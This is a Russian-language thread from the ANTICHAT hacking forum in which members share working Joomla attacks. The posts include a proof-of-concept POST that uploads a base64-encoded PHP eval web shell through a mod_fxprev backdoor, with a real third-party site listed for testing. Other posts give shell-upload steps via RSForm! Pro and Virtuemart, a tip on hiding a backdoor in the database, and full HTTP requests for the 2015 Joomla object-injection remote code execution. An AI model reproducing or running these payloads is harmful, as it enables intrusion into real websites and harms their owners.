ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.11.2015, 15:37
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Joomla "mod_fxprev"
modules/mod_fxprev/libraries/tmpl.php
Уязвимый участок кода:
Сообщение от None
$basepath = str_replace('/modules/mod_fxprev/libraries/tmpl.php','',$_SERVER['SCRIPT_FILENAME']) ;
$hostname = $_SERVER['HTTP_HOST'];
$action = $_POST['action'];
$file = $_POST['file'];
$data = base64_decode($_POST['data']);
$tmpdir = $_POST['tmpdir'];
...
} else if ($action == 'create') {
$ftime = filemtime("$basepath/components/com_content");
echo file_put_contents($file, $data);
touch("$basepath/components/com_content", $ftime, $ftime);
touch("$basepath/components/com_content/article.php", $ftime, $ftime);
}
POC:
Сообщение от None
POST: action=create&file=shell.php&data=PD9waHAgZXZhbCgk X1BPU1RbJ2lkJ10pOyA/Pg==
для тестов:
Сообщение от None
_ttp://arabica.com.au/oldfile/modules/mod_fxprev/mod_fxprev.xml
_ttp://arabica.com.au/oldfile/modules/mod_fxprev/libraries/tmpl.php
|
|
|
05.12.2015, 19:33
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Заливка шелла через RSForm! Pro тестировал на версии 1.50.0
Требуются админские права!!!
В админке переходим: Компоненты-> RSForm! Pro -> Управление формами -> (Выбираем любую форму) -> Свойства -> Скрипты (Сценарии выполнения программы)
в первое же поле вбиваем phpinfo(); и профит!
Скрипт выполняющий код:
administrator\components\com_rsform\helpers\rsform .php - 1981 строчка
eval($form->ScriptDisplay);
Запись для выполнения кода заносятся в таблицу JOS__rsform_forms в колонки ScriptProcess, ScriptProcess2, ScriptDisplay
Таким образом мы можем спрятать бегдор в БД!
|
|
|
|
05.12.2015, 22:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
хм, ок))
Заливка шелла через Virtuemart, нужны права одмина или модератора, как повезет
1.Заливка с Front End
смотрим id товара с тегов, их атрибутов и тд и далее переходим по урлю ?option=com_virtuemart&tmpl=component&view=product &task=edit&virtuemart_product_id=[id]и грузим в фото товара с PHP расширением.
2. Заливка с админки
В фото товара льем свой шелл c PHP расширением.
|
|
|
|
15.12.2015, 18:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
Joomla 0day RCE (от 1.5 до 3.4)
Код:
Code:
GET /joomla/ HTTP/1.1
Host: 192.168.152.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
x-forwarded-for: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}ð
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 82864b7eae85ebcf7a6fbdda5d464249=h5kl99v8ddi9t64919sf706q64
Connection: keep-alive
Код:
Code:
POST /joomla/ HTTP/1.1
Host: 192.168.152.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 82864b7eae85ebcf7a6fbdda5d464249=h5kl99v8ddi9t64919sf706q64
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
111=cGhwaW5mbygpOw%3d%3d
Дисклос: https://blog.sucuri.net/2015/12/remo...in-joomla.html
PoC: http://www.freebuf.com/vuls/89754.html |
|
|
|
15.12.2015, 20:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
137056
Репутация:
11
|
|
Сообщение от VY_CMa
VY_CMa said:
↑
Joomla 0day RCE (от 1.5 до 3.4)
Код:
Code:
GET /joomla/ HTTP/1.1
Host: 192.168.152.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
x-forwarded-for: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}ð
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 82864b7eae85ebcf7a6fbdda5d464249=h5kl99v8ddi9t64919sf706q64
Connection: keep-alive
Код:
Code:
POST /joomla/ HTTP/1.1
Host: 192.168.152.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 82864b7eae85ebcf7a6fbdda5d464249=h5kl99v8ddi9t64919sf706q64
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
111=cGhwaW5mbygpOw%3d%3d
Дисклос:
https://blog.sucuri.net/2015/12/remo...in-joomla.html
PoC:
http://www.freebuf.com/vuls/89754.htmlА есть подробности использования? И получилось ли у кого-нибудь заюзать?
|
|
|
|
15.12.2015, 20:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от blackbox
blackbox said:
↑
А есть подробности использования? И получилось ли у кого-нибудь заюзать?
Код:
Code:
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Запрос сробатывает со второго раза!
|
|
|
|
15.12.2015, 21:06
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902
Репутация:
0
|
|
Код:
Code:
eval(base64_decode($_POST[111]))
111 - это я так понимаю место для shell'a? |
|
|
|
15.12.2015, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
|
|
|
|
16.12.2015, 00:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
25727
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
Код:
Code:
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Запрос сробатывает со второго раза! А как выполнить этот запрос?
|
|
|
|
16.12.2015, 12:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
336
Репутация:
0
|
|
Народ, а кто нибудь может платно показать как работает эта уязвимость. Все вопросы в личку.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
